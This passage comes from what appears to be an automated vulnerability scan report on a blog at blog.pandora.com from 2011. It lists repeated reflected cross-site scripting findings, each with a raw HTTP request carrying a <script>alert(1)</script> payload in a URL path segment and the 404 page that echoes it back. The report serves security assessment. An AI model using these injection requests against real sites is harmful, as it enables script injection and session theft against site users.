Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ was not found on this server.</p>
...[SNIP]...

3.96. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)</script>2c3a3b69a5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ was not found on this server.</p>
...[SNIP]...

3.97. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)</script>370b7b6a4ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ was not found on this server.</p>
...[SNIP]...

3.98. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)</script>4fb98f6e6f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ was not found on this server.</p>
...[SNIP]...

3.99. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)</script>9a08076521d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ was not found on this server.</p>
...[SNIP]...

3.100. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)</script>62f82312779 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ was not found on this server.</p>
...[SNIP]...

3.101. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)</script>cbdd421d4ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ was not found on this server.</p>
...[SNIP]...

3.102. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)</script>c5395df2fbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ was not found on this server.</p>
...[SNIP]...

3.103. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)</script>1397d442dff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ was not found on this server.</p>
...[SNIP]...

3.104. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)</script>a841a197765 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ was not found on this server.</p>
...[SNIP]...

3.105. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)</script>6fc6995917b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ was not found on this server.</p>
...[SNIP]...

3.106. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)</script>cfaacaaf3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ was not found on this server.</p>
...[SNIP]...

3.107. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)</script>7c9340a2e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ was not found on this server.</p>
...[SNIP]...

3.108. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)</script>d624e770f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ was not found on this server.</p>
...[SNIP]...

3.109. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)</script>060e4b9ef4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ was not found on this server.</p>
...[SNIP]...

3.110. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)</script>ad8c655c453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ was not found on this server.</p>
...[SNIP]...

3.111. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)</script>57eed6c6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ was not found on this server.</p>
...[SNIP]...

3.112. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)</script>a51d01b1831 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
